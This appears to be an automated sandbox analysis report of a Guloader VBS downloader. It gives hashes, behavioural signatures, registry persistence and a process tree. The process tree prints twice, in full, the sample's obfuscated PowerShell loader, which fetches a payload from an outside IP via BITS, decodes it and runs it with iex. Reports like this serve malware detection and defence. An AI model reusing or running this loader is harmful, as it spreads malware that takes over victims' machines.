Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
13/02/2024, 03:03
Static task
static1
Behavioral task
behavioral1
Sample
4899cdb23cf206532e2ccfe1eb170256012e2ee7664a89e5472e52f2a6274001.vbs
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
4899cdb23cf206532e2ccfe1eb170256012e2ee7664a89e5472e52f2a6274001.vbs
Resource
win10v2004-20231215-en
General
-
Target
4899cdb23cf206532e2ccfe1eb170256012e2ee7664a89e5472e52f2a6274001.vbs
-
Size
36KB
-
MD5
de8bb4e7b3b42adcc01eaf37409ba15a
-
SHA1
77e869d2cdb86aea090f14a444e0d1ee39e5cd68
-
SHA256
4899cdb23cf206532e2ccfe1eb170256012e2ee7664a89e5472e52f2a6274001
-
SHA512
5258eaf86e2da5799b8d4c73c5b7047502d7e66000bef6b6680aafc931c7590eb005917c9af4c8a788ee16638870354c3f044434d381b934f5ada38c09a48569
-
SSDEEP
768:vUJZmkTEmGkXZwCwzWfMKjWcHISdD0i6z2l+KaRB0e:cJLEXM9wzPKjXHISJ0i6z2w/f
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Adds policy Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \Registry\User\S-1-5-21-996941297-2279405024-2328152752-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run SyncHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\A0-8MH5PD = "C:\\Program Files (x86)\\windows mail\\wab.exe" SyncHost.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\International\Geo\Nation WScript.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2400 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4308 powershell.exe 2400 wab.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 4308 set thread context of 2400 4308 powershell.exe 101 PID 2400 set thread context of 3424 2400 wab.exe 29 PID 2400 set thread context of 2684 2400 wab.exe 102 PID 2684 set thread context of 3424 2684 SyncHost.exe 29 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 46 IoCs
pid Process 1800 powershell.exe 1800 powershell.exe 4308 powershell.exe 4308 powershell.exe 2400 wab.exe 2400 wab.exe 2400 wab.exe 2400 wab.exe 2400 wab.exe 2400 wab.exe 2400 wab.exe 2400 wab.exe 2400 wab.exe 2400 wab.exe 2400 wab.exe 2400 wab.exe 2400 wab.exe 2400 wab.exe 2400 wab.exe 2400 wab.exe 2684 SyncHost.exe 2684 SyncHost.exe 2684 SyncHost.exe 2684 SyncHost.exe 2684 SyncHost.exe 2684 SyncHost.exe 2684 SyncHost.exe 2684 SyncHost.exe 2684 SyncHost.exe 2684 SyncHost.exe 2684 SyncHost.exe 2684 SyncHost.exe 2684 SyncHost.exe 2684 SyncHost.exe 2684 SyncHost.exe 2684 SyncHost.exe 2684 SyncHost.exe 2684 SyncHost.exe 2684 SyncHost.exe 2684 SyncHost.exe 2684 SyncHost.exe 2684 SyncHost.exe 2684 SyncHost.exe 2684 SyncHost.exe 2684 SyncHost.exe 2684 SyncHost.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 4308 powershell.exe 2400 wab.exe 3424 Explorer.EXE 3424 Explorer.EXE 2684 SyncHost.exe 2684 SyncHost.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1800 powershell.exe Token: SeDebugPrivilege 4308 powershell.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 4564 wrote to memory of 1800 4564 WScript.exe 84 PID 4564 wrote to memory of 1800 4564 WScript.exe 84 PID 1800 wrote to memory of 400 1800 powershell.exe 86 PID 1800 wrote to memory of 400 1800 powershell.exe 86 PID 400 wrote to memory of 2736 400 cmd.exe 87 PID 400 wrote to memory of 2736 400 cmd.exe 87 PID 1800 wrote to memory of 4308 1800 powershell.exe 89 PID 1800 wrote to memory of 4308 1800 powershell.exe 89 PID 1800 wrote to memory of 4308 1800 powershell.exe 89 PID 4308 wrote to memory of 4948 4308 powershell.exe 90 PID 4308 wrote to memory of 4948 4308 powershell.exe 90 PID 4308 wrote to memory of 4948 4308 powershell.exe 90 PID 4948 wrote to memory of 4632 4948 cmd.exe 91 PID 4948 wrote to memory of 4632 4948 cmd.exe 91 PID 4948 wrote to memory of 4632 4948 cmd.exe 91 PID 4308 wrote to memory of 2400 4308 powershell.exe 101 PID 4308 wrote to memory of 2400 4308 powershell.exe 101 PID 4308 wrote to memory of 2400 4308 powershell.exe 101 PID 4308 wrote to memory of 2400 4308 powershell.exe 101 PID 4308 wrote to memory of 2400 4308 powershell.exe 101 PID 3424 wrote to memory of 2684 3424 Explorer.EXE 102 PID 3424 wrote to memory of 2684 3424 Explorer.EXE 102 PID 3424 wrote to memory of 2684 3424 Explorer.EXE 102
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3424 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4899cdb23cf206532e2ccfe1eb170256012e2ee7664a89e5472e52f2a6274001.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sengetj;function Inacho37 ($Reunitea, $Stasop, $Unre) {$Reunitea.'Substring'( $Stasop, $Unre);}Function Over9 ([String]$Leadoffe){For($Boilers=5; $Boilers -lt $Leadoffe.Length-$Camp; $Boilers+=6){$Concisely=Inacho37 $Leadoffe $Boilers $Camp;$Finans=$Finans+$Concisely}$Finans;}$Sneboldeff = 'tzutil /l';$Skva44 = (cmd /c $Sneboldeff);$Skva44 = [string]$Skva44;$BoilersNDICE = $Skva44.indexOf('1');$Camp = Inacho37 $Skva44 $BoilersNDICE 1;$Nonp=Over9 ' kanihFejletScopotNonacp Arbi:Amphi/Forel/Chowc4Fileh6 Spkl.kongs1Udann8 Udtr3 Hair.Prepr2neate2Udspi2 Indu.Trafi1Bakni9retsm/MandeOHalitpSalumsAssesvSkggeuTikrolForfamFirepeRabbi.ValutdUncons ImpopHypno ';$Finans01=Over9 'PensiiAncreeGeorgx Stud ';$Samsskb = Over9 'Epupi\HandlsSamaryDistesStenmwNonmeoUnattw Bere6 Glos4Bejds\EcuadWAbonniHypernRadiadCacozoPermuwkardisSvajnP PlatoCapmawForpre AflurPhoenSLscflh FrisejaloulBlentlEksam\ ConfvChatt1Yndig.Storl0 Naga\IfsvipHouseo Duftw CasaeSammerPtsmksPatenhdualieStrobl Pyralcremn.NoneveDobbexAssemeradia ';&($Finans01) (Over9 'Overi$MinimSOverlpUtjeklFolinaFlove2Konfi= Rang$Syphie RevinSyllavAftvi:ExcitwNongiiKrambn UnredDiethiMultir Oven ') ;&($Finans01) (Over9 'Dyret$BrnepSTypogaBlokhmJugulsWinchsTumpfkBordebTubif=Under$ AnsvS EnfepLnsitlSurbeaHiero2Ynksm+Playm$ObskuSEkspaaSneplmPrints Fetas WaylkBenthbTrdes ') ;&($Finans01) (Over9 ' Fore$BegreELindekGatatsFoalte UndemGentopKendteAfbinl nicktMinimeSkovr Renab=Talni Kile(Betvi(PippigBitinwChirpm Stati Affa Sakfrwpreeli EchonUnbud3Resse2Atlas_Calypp Cowhr Blaco DreacKonfre TrlasKorrespanda Trans-FabriFCynop IncesPPakkergtebaoSignicSakkae SoeesSkibssCamelIEksisdUdbyt=Salmi$Plund{ KokePAppliIdysmoDfloru} Aand)Desmo.fueloCstilloSkatomRestamTerriaDitzinKortsdFaceoLStkkeiDisapnAdelaeFremm)repeo Borta-BinghsLnindpHanknlStvneiOverstBrogu Tocc[Tronpc NasthPinseaKunstrCorom]Barne3Cyber4Throu ');&($Finans01) (Over9 ' Undi$FolkeS EpippUnyttiSubcodSlabbsProgrfViden slurr=Terat Cusks$podiaEGumbokcincisChefge JaegmShintpSkulpeRdarvlOverst VexieDunie[Julek$ PleaE MedikGendasDipheemarblmUnsabpYeshie Foldl UbebtBabaje Lyci. ExcrcNauruoEmoluukropdnSpaketPrime-Prang2Uviss]Stere ');&($Finans01) (Over9 ' Poli$VelseOKagesmIndisdTrersa MicrnUnivenstifieAnoin=Miens(EmneaTGynece RevisExtrat Adko-ProabPHelbeaSkindtAtonah Indk Stop$HerniSTeskeaSarksm Tryks StjrsArithkHelmhbBudbr)Gulli Hjemm-SnerlA impanBraildBevid Virus(Umtte[TumliIAvancnUnsedt UnasPPyopot Forrr Fore]Vrels:Doles:FoamssSgersiStenuzjerngeLakfj Tribo-OutpoeBrdflqOpsge Sheat8Fuelo)Suben ') ;if ($Omdanne) {.$Samsskb $Spidsf;} else {;$Finans00=Over9 'BanglSPirogtTuensaLbetirNonintKontr-KlemsBRealliSammetOlietsUnfeaTTuladrAldidaForannCoryds richfStraneKashurKryds Fangi-KutenS CapooBrahmu StdprPantec Kirtebarbe Modta$ UndsNNeedloUlykknRansop Expe Dehy-BrsigDrivuleUdbansHighbttruehiJrginnDemora FlagtHasteiPlagso sapinIlsom Engel$AutenSBusfapTrimelfeveraItali2Encho ';&($Finans01) (Over9 'Super$MaddiSubeslp SvenlVerdiaTilgr2Fodbo=Ethox$CotereAgurknSalgsvarche: UnosaVinstpSonorpZoomodstropa KdvatCorpoaHafto ') ;&($Finans01) (Over9 'MisusIKoldtmHydropBorgmoDonumrDiplotWaggo-BrillMOndsioSkuffdFactuuFyldelInsipe Yata PantaBtilegi EvoltSorelsKorneTbommerFrilgaCyclonWcspesTrafifLabileoverirDiest ') ;$Spla2=$Spla2+'\Stat.Kol';while (-not $Retankam) {&($Finans01) (Over9 ' Paal$aedilRCodife CurstunscaaDolkenPyocykAnisbaStokemSkrib=Likvi( ProlTSuggeeAntimsUnunitRaind-StanzP EuchaHovmotRetaihKalkm taans$SociaSAorispUnderlOutlaaJoyle2Bejez)Canke ') ;&($Finans01) $Finans00;&($Finans01) (Over9 'LouanSangultIndicaTilfgrCommetKosmo-IndsnSStrstlCorcleSejrveLnnedppapir Data5Andan ');}&($Finans01) (Over9 'raads$StvniOalithv CauleFidgerGoldi Uddat=Paris FiredGProcoeMadrot Vari- TitlCSociaoTekstn DemitFedesePageunMervrtAtloa Dyrk$SidegSBlystpSlutnl BarcaSulfo2Planl ');&($Finans01) (Over9 'Ricin$StenrOFormsp Bisca TranlRedigiKnscesOzenahBefjeb Snoo Span=Forst laang[TelynSGliocyBaldasSursytTonjoe FucomIntim.FlamlCHemitoHalvmnThailvNonnaeTaarnrPaedat Wrok]otone:Nycta:UntakFMultir Muddooctylm BathBCarpoaRivers GobeeLysim6Forli4OstenSBismet AbutrBaulkiRunklnDatalgTapet(Prest$ ukriOSupervEskadeBdestrEyela)Lensa ');&($Finans01) (Over9 'Locat$BurdaFHusleiMelapnShowwa Shinn MarasUddel2 Seve Polic= Circ Betyd[FloodS BefjyOverssBlaaftOwetieFuldkmFlett.VicedTCentieHnsehxDyssetOpgav.FarefEKnippn AcrocAntidoNonindtelcoi BelunGlutigDeskr]Barth:Bibli: ShivA PersSOutseCYnderIterseIPhleb. OrbiGJingleRvenstQuadrSFattitAtmenrKnighiCarbunRevsegCladd(Tilnr$ BillOUdslapFrdigaOverkl AutoiKetipssuccohRectibIndst)Powde ');&($Finans01) (Over9 ' Flyb$FremsCDenasuPejlepLadyeufjtedlDdsfo=Oryde$AtabeFTitiliSpatinUdspeaFyrafnObskus Skva2Mccal.Forans LobeuBoatlbnitros Rorkt BurirAllitiDemognFrnutgSomat(Marri2Fedts9udvik8Sygev4Convo4Hidti5Indse,Video1outta9Angel4Forpe1Aabni9 Unde) Staa ');&($Finans01) $Cupul;}"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "tzutil /l"4⤵
- Suspicious use of WriteProcessMemory
PID:400 -
C:\Windows\system32\tzutil.exetzutil /l5⤵PID:2736
-
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$sengetj;function Inacho37 ($Reunitea, $Stasop, $Unre) {$Reunitea.'Substring'( $Stasop, $Unre);}Function Over9 ([String]$Leadoffe){For($Boilers=5; $Boilers -lt $Leadoffe.Length-$Camp; $Boilers+=6){$Concisely=Inacho37 $Leadoffe $Boilers $Camp;$Finans=$Finans+$Concisely}$Finans;}$Sneboldeff = 'tzutil /l';$Skva44 = (cmd /c $Sneboldeff);$Skva44 = [string]$Skva44;$BoilersNDICE = $Skva44.indexOf('1');$Camp = Inacho37 $Skva44 $BoilersNDICE 1;$Nonp=Over9 ' kanihFejletScopotNonacp Arbi:Amphi/Forel/Chowc4Fileh6 Spkl.kongs1Udann8 Udtr3 Hair.Prepr2neate2Udspi2 Indu.Trafi1Bakni9retsm/MandeOHalitpSalumsAssesvSkggeuTikrolForfamFirepeRabbi.ValutdUncons ImpopHypno ';$Finans01=Over9 'PensiiAncreeGeorgx Stud ';$Samsskb = Over9 'Epupi\HandlsSamaryDistesStenmwNonmeoUnattw Bere6 Glos4Bejds\EcuadWAbonniHypernRadiadCacozoPermuwkardisSvajnP PlatoCapmawForpre AflurPhoenSLscflh FrisejaloulBlentlEksam\ ConfvChatt1Yndig.Storl0 Naga\IfsvipHouseo Duftw CasaeSammerPtsmksPatenhdualieStrobl Pyralcremn.NoneveDobbexAssemeradia ';&($Finans01) (Over9 'Overi$MinimSOverlpUtjeklFolinaFlove2Konfi= Rang$Syphie RevinSyllavAftvi:ExcitwNongiiKrambn UnredDiethiMultir Oven ') ;&($Finans01) (Over9 'Dyret$BrnepSTypogaBlokhmJugulsWinchsTumpfkBordebTubif=Under$ AnsvS EnfepLnsitlSurbeaHiero2Ynksm+Playm$ObskuSEkspaaSneplmPrints Fetas WaylkBenthbTrdes ') ;&($Finans01) (Over9 ' Fore$BegreELindekGatatsFoalte UndemGentopKendteAfbinl nicktMinimeSkovr Renab=Talni Kile(Betvi(PippigBitinwChirpm Stati Affa Sakfrwpreeli EchonUnbud3Resse2Atlas_Calypp Cowhr Blaco DreacKonfre TrlasKorrespanda Trans-FabriFCynop IncesPPakkergtebaoSignicSakkae SoeesSkibssCamelIEksisdUdbyt=Salmi$Plund{ KokePAppliIdysmoDfloru} Aand)Desmo.fueloCstilloSkatomRestamTerriaDitzinKortsdFaceoLStkkeiDisapnAdelaeFremm)repeo Borta-BinghsLnindpHanknlStvneiOverstBrogu Tocc[Tronpc NasthPinseaKunstrCorom]Barne3Cyber4Throu ');&($Finans01) (Over9 ' Undi$FolkeS EpippUnyttiSubcodSlabbsProgrfViden slurr=Terat Cusks$podiaEGumbokcincisChefge JaegmShintpSkulpeRdarvlOverst VexieDunie[Julek$ PleaE MedikGendasDipheemarblmUnsabpYeshie Foldl UbebtBabaje Lyci. ExcrcNauruoEmoluukropdnSpaketPrime-Prang2Uviss]Stere ');&($Finans01) (Over9 ' Poli$VelseOKagesmIndisdTrersa MicrnUnivenstifieAnoin=Miens(EmneaTGynece RevisExtrat Adko-ProabPHelbeaSkindtAtonah Indk Stop$HerniSTeskeaSarksm Tryks StjrsArithkHelmhbBudbr)Gulli Hjemm-SnerlA impanBraildBevid Virus(Umtte[TumliIAvancnUnsedt UnasPPyopot Forrr Fore]Vrels:Doles:FoamssSgersiStenuzjerngeLakfj Tribo-OutpoeBrdflqOpsge Sheat8Fuelo)Suben ') ;if ($Omdanne) {.$Samsskb $Spidsf;} else {;$Finans00=Over9 'BanglSPirogtTuensaLbetirNonintKontr-KlemsBRealliSammetOlietsUnfeaTTuladrAldidaForannCoryds richfStraneKashurKryds Fangi-KutenS CapooBrahmu StdprPantec Kirtebarbe Modta$ UndsNNeedloUlykknRansop Expe Dehy-BrsigDrivuleUdbansHighbttruehiJrginnDemora FlagtHasteiPlagso sapinIlsom Engel$AutenSBusfapTrimelfeveraItali2Encho ';&($Finans01) (Over9 'Super$MaddiSubeslp SvenlVerdiaTilgr2Fodbo=Ethox$CotereAgurknSalgsvarche: UnosaVinstpSonorpZoomodstropa KdvatCorpoaHafto ') ;&($Finans01) (Over9 'MisusIKoldtmHydropBorgmoDonumrDiplotWaggo-BrillMOndsioSkuffdFactuuFyldelInsipe Yata PantaBtilegi EvoltSorelsKorneTbommerFrilgaCyclonWcspesTrafifLabileoverirDiest ') ;$Spla2=$Spla2+'\Stat.Kol';while (-not $Retankam) {&($Finans01) (Over9 ' Paal$aedilRCodife CurstunscaaDolkenPyocykAnisbaStokemSkrib=Likvi( ProlTSuggeeAntimsUnunitRaind-StanzP EuchaHovmotRetaihKalkm taans$SociaSAorispUnderlOutlaaJoyle2Bejez)Canke ') ;&($Finans01) $Finans00;&($Finans01) (Over9 'LouanSangultIndicaTilfgrCommetKosmo-IndsnSStrstlCorcleSejrveLnnedppapir Data5Andan ');}&($Finans01) (Over9 'raads$StvniOalithv CauleFidgerGoldi Uddat=Paris FiredGProcoeMadrot Vari- TitlCSociaoTekstn DemitFedesePageunMervrtAtloa Dyrk$SidegSBlystpSlutnl BarcaSulfo2Planl ');&($Finans01) (Over9 'Ricin$StenrOFormsp Bisca TranlRedigiKnscesOzenahBefjeb Snoo Span=Forst laang[TelynSGliocyBaldasSursytTonjoe FucomIntim.FlamlCHemitoHalvmnThailvNonnaeTaarnrPaedat Wrok]otone:Nycta:UntakFMultir Muddooctylm BathBCarpoaRivers GobeeLysim6Forli4OstenSBismet AbutrBaulkiRunklnDatalgTapet(Prest$ ukriOSupervEskadeBdestrEyela)Lensa ');&($Finans01) (Over9 'Locat$BurdaFHusleiMelapnShowwa Shinn MarasUddel2 Seve Polic= Circ Betyd[FloodS BefjyOverssBlaaftOwetieFuldkmFlett.VicedTCentieHnsehxDyssetOpgav.FarefEKnippn AcrocAntidoNonindtelcoi BelunGlutigDeskr]Barth:Bibli: ShivA PersSOutseCYnderIterseIPhleb. OrbiGJingleRvenstQuadrSFattitAtmenrKnighiCarbunRevsegCladd(Tilnr$ BillOUdslapFrdigaOverkl AutoiKetipssuccohRectibIndst)Powde ');&($Finans01) (Over9 ' Flyb$FremsCDenasuPejlepLadyeufjtedlDdsfo=Oryde$AtabeFTitiliSpatinUdspeaFyrafnObskus Skva2Mccal.Forans LobeuBoatlbnitros Rorkt BurirAllitiDemognFrnutgSomat(Marri2Fedts9udvik8Sygev4Convo4Hidti5Indse,Video1outta9Angel4Forpe1Aabni9 Unde) Staa ');&($Finans01) $Cupul;}"4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4308 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "tzutil /l"5⤵
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Windows\SysWOW64\tzutil.exetzutil /l6⤵PID:4632
-
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"5⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2400
-
-
-
-
-
C:\Windows\SysWOW64\SyncHost.exe"C:\Windows\SysWOW64\SyncHost.exe"2⤵
- Adds policy Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2684
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82